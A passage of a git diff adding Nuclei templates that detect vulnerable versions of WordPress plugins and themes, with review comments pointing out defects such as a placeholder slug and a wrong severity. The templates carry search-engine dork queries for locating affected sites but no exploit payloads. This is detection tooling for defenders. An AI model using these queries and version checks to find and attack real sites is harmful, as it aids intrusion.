\ No newline at end of file
diff --git a/poc/other/newsmunch.yaml b/poc/other/newsmunch.yaml
new file mode 100644
index 0000000000..5a16dbba03
--- /dev/null
+++ b/poc/other/newsmunch.yaml
@@ -0,0 +1,59 @@
+id: newsmunch
+
+info:
+ name: >
+ NewsMunch <= 1.0.35 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1a2b0ff4-9471-4fd0-ac1a-ed5b7b4af4ff?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/themes/newsmunch/"
+ google-query: inurl:"/wp-content/themes/newsmunch/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-theme,newsmunch,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/newsmunch/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "newsmunch"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.35')
\ No newline at end of file
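Review bot: The version regex `(?mi)Version: ([0-9.]+)` is not anchored to the stylesheet header, so with the `i` flag it captures the first "version: N" found anywhere in the response, and the only other content check is the word `newsmunch`, which a 200 error page echoing the requested path could also satisfy. Anchoring it similarly to how WordPress itself reads header fields, e.g. `'(?mi)^[ \t/*#@]*Version:\s*([0-9.]+)'` (single-quoted so the backslashes survive YAML), keeps the comparison tied to the theme header. The two extractors are identical apart from `internal: true`; a comment such as `# internal copy feeds compare_versions, the second one only prints the value` would explain the duplication. The newsmash, pubnews and soledad hunks use the same pattern.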
diff --git a/poc/other/onlyoffice-b402953c76f82d1b88842a9ee0c31f2f.yaml b/poc/other/onlyoffice-b402953c76f82d1b88842a9ee0c31f2f.yaml
new file mode 100644
index 0000000000..8e2daec677
--- /dev/null
+++ b/poc/other/onlyoffice-b402953c76f82d1b88842a9ee0c31f2f.yaml
@@ -0,0 +1,59 @@
+id: onlyoffice-b402953c76f82d1b88842a9ee0c31f2f
+
+info:
+ name: >
+ ONLYOFFICE Docs <= 2.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/80b71264-5b0f-41cb-86c1-a052d1976597?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/onlyoffice/"
+ google-query: inurl:"/wp-content/plugins/onlyoffice/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,onlyoffice,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/onlyoffice/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "onlyoffice"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.0')
\ No newline at end of file
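Review bot: `Stable tag:` in readme.txt is the release the plugin author points the directory at, not necessarily the version installed on the host, so `compare_versions(version, '<= 2.0.0')` is an inference rather than a confirmation. When the field reads `trunk` the capture `([0-9.]+)` finds nothing and the host is silently skipped, and when it lags behind the plugin header the template reports a patched install. I would add a comment above the extractors, `# Stable tag comes from readme.txt and may differ from the installed version; confirm before reporting`, and treat a missing capture as "unknown" in triage rather than "not affected". This applies to every hunk in this diff that requests `readme.txt`.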
diff --git a/poc/other/photo-video-store-9887b9e8aa29c789cc721ef3d676a573.yaml b/poc/other/photo-video-store-9887b9e8aa29c789cc721ef3d676a573.yaml
new file mode 100644
index 0000000000..ff9bd8723e
--- /dev/null
+++ b/poc/other/photo-video-store-9887b9e8aa29c789cc721ef3d676a573.yaml
@@ -0,0 +1,59 @@
+id: photo-video-store-9887b9e8aa29c789cc721ef3d676a573
+
+info:
+ name: >
+ Photo Video Store <= 21.07 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/202c22f1-48ce-4724-be5f-dece2a6f9adb?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/photo-video-store/"
+ google-query: inurl:"/wp-content/plugins/photo-video-store/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,photo-video-store,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/photo-video-store/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "photo-video-store"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 21.07')
\ No newline at end of file
diff --git a/poc/other/pixobe-cartography-b8d402b7f8267a8fbeabdc06350287fa.yaml b/poc/other/pixobe-cartography-b8d402b7f8267a8fbeabdc06350287fa.yaml
new file mode 100644
index 0000000000..f784700196
--- /dev/null
+++ b/poc/other/pixobe-cartography-b8d402b7f8267a8fbeabdc06350287fa.yaml
@@ -0,0 +1,59 @@
+id: pixobe-cartography-b8d402b7f8267a8fbeabdc06350287fa
+
+info:
+ name: >
+ Pixobe Cartography <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3c6949f9-316c-4e48-a77a-ace793d329ac?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/pixobe-cartography/"
+ google-query: inurl:"/wp-content/plugins/pixobe-cartography/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,pixobe-cartography,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/pixobe-cartography/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "pixobe-cartography"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.1')
\ No newline at end of file
diff --git a/poc/other/plugin-951ffa4455cde2cf84338c23f5961c7d.yaml b/poc/other/plugin-951ffa4455cde2cf84338c23f5961c7d.yaml
new file mode 100644
index 0000000000..f4ee5fc613
--- /dev/null
+++ b/poc/other/plugin-951ffa4455cde2cf84338c23f5961c7d.yaml
@@ -0,0 +1,59 @@
+id: plugin-951ffa4455cde2cf84338c23f5961c7d
+
+info:
+ name: >
+ WP Revisions Manager <= 1.0.2 - Cross-Site Request Forgery
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/96a5db79-a88d-4c1f-9da4-6dd3120ff85e?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/Plugin/"
+ google-query: inurl:"/wp-content/plugins/Plugin/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,Plugin,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/Plugin/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "Plugin"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.2')
\ No newline at end of file
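Review bot: The slug in this template is the literal `Plugin`, which looks like a generator placeholder rather than the directory of WP Revisions Manager: the request goes to `/wp-content/plugins/Plugin/readme.txt` and the word matcher is `"Plugin"`, a string that occurs in almost any WordPress readme. As written the template will either never reach the affected plugin or flag an unrelated one whose Stable tag happens to be at or below 1.0.2. The path, `fofa-query`, `google-query`, the slug tag and the word matcher should use the plugin's real directory name from the linked Wordfence advisory, e.g. `- "{{BaseURL}}/wp-content/plugins/<plugin-slug>/readme.txt"` with the placeholder replaced. The `id` and file name carry the same `plugin-` prefix and would need the same correction.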
diff --git a/poc/other/post-carousel-slider-for-elementor-7ce3093d4f3e9adea14ad773b3a3df2a.yaml b/poc/other/post-carousel-slider-for-elementor-7ce3093d4f3e9adea14ad773b3a3df2a.yaml
new file mode 100644
index 0000000000..76c220a48c
--- /dev/null
+++ b/poc/other/post-carousel-slider-for-elementor-7ce3093d4f3e9adea14ad773b3a3df2a.yaml
@@ -0,0 +1,59 @@
+id: post-carousel-slider-for-elementor-7ce3093d4f3e9adea14ad773b3a3df2a
+
+info:
+ name: >
+ Post Carousel Slider for Elementor <= 1.4.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c205041a-01c9-44cd-8270-dafae2a78cbf?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/post-carousel-slider-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/post-carousel-slider-for-elementor/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,post-carousel-slider-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/post-carousel-slider-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "post-carousel-slider-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.0')
\ No newline at end of file
diff --git a/poc/other/powerpack-lite-for-elementor-a7a3589609ae92e0dc1bd8b339906582.yaml b/poc/other/powerpack-lite-for-elementor-a7a3589609ae92e0dc1bd8b339906582.yaml
new file mode 100644
index 0000000000..3e4246dec5
--- /dev/null
+++ b/poc/other/powerpack-lite-for-elementor-a7a3589609ae92e0dc1bd8b339906582.yaml
@@ -0,0 +1,59 @@
+id: powerpack-lite-for-elementor-a7a3589609ae92e0dc1bd8b339906582
+
+info:
+ name: >
+ PowerPack Elementor Addons (Free Widgets, Extensions and Templates) <= 2.8.1 - Authenticated (Contributor+) Post Disclosure
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d073d9df-0636-4884-b5d0-e2da779e5edf?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/powerpack-lite-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/powerpack-lite-for-elementor/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,powerpack-lite-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/powerpack-lite-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "powerpack-lite-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.8.1')
\ No newline at end of file
diff --git a/poc/other/pubnews-5b335bb90b570f570873fbfa38b47c5b.yaml b/poc/other/pubnews-5b335bb90b570f570873fbfa38b47c5b.yaml
new file mode 100644
index 0000000000..a1b6b36e68
--- /dev/null
+++ b/poc/other/pubnews-5b335bb90b570f570873fbfa38b47c5b.yaml
@@ -0,0 +1,59 @@
+id: pubnews-5b335bb90b570f570873fbfa38b47c5b
+
+info:
+ name: >
+ Pubnews <= 1.0.7 - Unauthenticated Arbitrary Plugin Installation
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7eaa0117-5320-431f-b3d2-05a867901528?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/themes/pubnews/"
+ google-query: inurl:"/wp-content/themes/pubnews/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-theme,pubnews,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/pubnews/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "pubnews"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.7')
\ No newline at end of file
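Review bot: `severity: low` and the trailing `low` tag do not fit this template's title, "Unauthenticated Arbitrary Plugin Installation", which describes an unauthenticated change to the site's code; the other unauthenticated file-inclusion entries in this diff (soledad, swift-performance-lite) are rated `critical`. With `cvss-score` left empty there is nothing in the hunk to check the rating against, so the value is probably a generator default. Take the score from the linked Wordfence advisory and set `severity` and the last tag to match, otherwise scans filtered by severity will drop this finding.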
diff --git a/poc/other/random-banner-0b21c7eea2233a52fab8c4a62c453192.yaml b/poc/other/random-banner-0b21c7eea2233a52fab8c4a62c453192.yaml
new file mode 100644
index 0000000000..a05ab1db45
--- /dev/null
+++ b/poc/other/random-banner-0b21c7eea2233a52fab8c4a62c453192.yaml
@@ -0,0 +1,59 @@
+id: random-banner-0b21c7eea2233a52fab8c4a62c453192
+
+info:
+ name: >
+ Random Banner <= 4.2.9 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/32369351-ddae-452f-b286-6478deab5a97?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/random-banner/"
+ google-query: inurl:"/wp-content/plugins/random-banner/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,random-banner,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/random-banner/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "random-banner"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.2.9')
\ No newline at end of file
diff --git a/poc/other/rccp-free-addabdad3f0edc1afcad78dcfe322e09.yaml b/poc/other/rccp-free-addabdad3f0edc1afcad78dcfe322e09.yaml
new file mode 100644
index 0000000000..023236a3f3
--- /dev/null
+++ b/poc/other/rccp-free-addabdad3f0edc1afcad78dcfe322e09.yaml
@@ -0,0 +1,59 @@
+id: rccp-free-addabdad3f0edc1afcad78dcfe322e09
+
+info:
+ name: >
+ RingCentral Communications <= 1.6.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/de4ba999-3312-4bcc-ab87-574b7994e07e?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/rccp-free/"
+ google-query: inurl:"/wp-content/plugins/rccp-free/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,rccp-free,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/rccp-free/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "rccp-free"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.6.1')
\ No newline at end of file
diff --git a/poc/other/simple-popup-plugin-cf96f5f0cc1e34ba0f87c5a246e6b6a7.yaml b/poc/other/simple-popup-plugin-cf96f5f0cc1e34ba0f87c5a246e6b6a7.yaml
new file mode 100644
index 0000000000..0404fba6da
--- /dev/null
+++ b/poc/other/simple-popup-plugin-cf96f5f0cc1e34ba0f87c5a246e6b6a7.yaml
@@ -0,0 +1,59 @@
+id: simple-popup-plugin-cf96f5f0cc1e34ba0f87c5a246e6b6a7
+
+info:
+ name: >
+ Simple Popup <= 4.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e993667f-8275-4078-afd5-b26ff8528ab4?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/simple-popup-plugin/"
+ google-query: inurl:"/wp-content/plugins/simple-popup-plugin/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,simple-popup-plugin,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/simple-popup-plugin/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "simple-popup-plugin"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.6')
\ No newline at end of file
diff --git a/poc/other/simpleschema-free-d19ba041fbf80d78fb62d140a19bbe1d.yaml b/poc/other/simpleschema-free-d19ba041fbf80d78fb62d140a19bbe1d.yaml
new file mode 100644
index 0000000000..5545067088
--- /dev/null
+++ b/poc/other/simpleschema-free-d19ba041fbf80d78fb62d140a19bbe1d.yaml
@@ -0,0 +1,59 @@
+id: simpleschema-free-d19ba041fbf80d78fb62d140a19bbe1d
+
+info:
+ name: >
+ SimpleSchema <= 1.7.6.9 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/81500371-93d3-4cee-a992-93d2469f5233?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/simpleschema-free/"
+ google-query: inurl:"/wp-content/plugins/simpleschema-free/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,simpleschema-free,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/simpleschema-free/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "simpleschema-free"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.7.6.9')
\ No newline at end of file
diff --git a/poc/other/skyboot-portfolio-gallery-b1da3f38e609312a5083d34cf5925003.yaml b/poc/other/skyboot-portfolio-gallery-b1da3f38e609312a5083d34cf5925003.yaml
new file mode 100644
index 0000000000..548c8b7269
--- /dev/null
+++ b/poc/other/skyboot-portfolio-gallery-b1da3f38e609312a5083d34cf5925003.yaml
@@ -0,0 +1,59 @@
+id: skyboot-portfolio-gallery-b1da3f38e609312a5083d34cf5925003
+
+info:
+ name: >
+ Elementor Image Gallery Plugin <= 1.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/52a094b0-acee-412a-ad15-38c9f4510c48?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/skyboot-portfolio-gallery/"
+ google-query: inurl:"/wp-content/plugins/skyboot-portfolio-gallery/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,skyboot-portfolio-gallery,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/skyboot-portfolio-gallery/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "skyboot-portfolio-gallery"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.3')
\ No newline at end of file
diff --git a/poc/other/smart-popup-blaster-30df007059118a37ebbef148c110f5c7.yaml b/poc/other/smart-popup-blaster-30df007059118a37ebbef148c110f5c7.yaml
new file mode 100644
index 0000000000..ddc09ecc52
--- /dev/null
+++ b/poc/other/smart-popup-blaster-30df007059118a37ebbef148c110f5c7.yaml
@@ -0,0 +1,59 @@
+id: smart-popup-blaster-30df007059118a37ebbef148c110f5c7
+
+info:
+ name: >
+ Smart PopUp Blaster <= 1.4.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e10f391a-6663-4222-8266-ab911c588b76?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/smart-popup-blaster/"
+ google-query: inurl:"/wp-content/plugins/smart-popup-blaster/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,smart-popup-blaster,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/smart-popup-blaster/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "smart-popup-blaster"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.3')
\ No newline at end of file
diff --git a/poc/other/softtemplates-for-elementor-ecddfed759e913087d218b9e237f2c06.yaml b/poc/other/softtemplates-for-elementor-ecddfed759e913087d218b9e237f2c06.yaml
new file mode 100644
index 0000000000..98d4bda3f2
--- /dev/null
+++ b/poc/other/softtemplates-for-elementor-ecddfed759e913087d218b9e237f2c06.yaml
@@ -0,0 +1,59 @@
+id: softtemplates-for-elementor-ecddfed759e913087d218b9e237f2c06
+
+info:
+ name: >
+ Softtemplates For Elementor <= 1.0.8 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0db63414-b8c3-41bf-a6df-4b6113ea7388?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/softtemplates-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/softtemplates-for-elementor/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,softtemplates-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/softtemplates-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "softtemplates-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.8')
\ No newline at end of file
diff --git a/poc/other/soledad-29fa607193cd3b39b09ca02b2ce4f403.yaml b/poc/other/soledad-29fa607193cd3b39b09ca02b2ce4f403.yaml
new file mode 100644
index 0000000000..3c7ac28665
--- /dev/null
+++ b/poc/other/soledad-29fa607193cd3b39b09ca02b2ce4f403.yaml
@@ -0,0 +1,59 @@
+id: soledad-29fa607193cd3b39b09ca02b2ce4f403
+
+info:
+ name: >
+ Soledad <= 8.5.9 - Unauthenticated Limited Local File Inclusion
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/927674db-05f1-4f3b-8297-8a907955ea87?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/themes/soledad/"
+ google-query: inurl:"/wp-content/themes/soledad/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-theme,soledad,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/soledad/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "soledad"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 8.5.9')
\ No newline at end of file
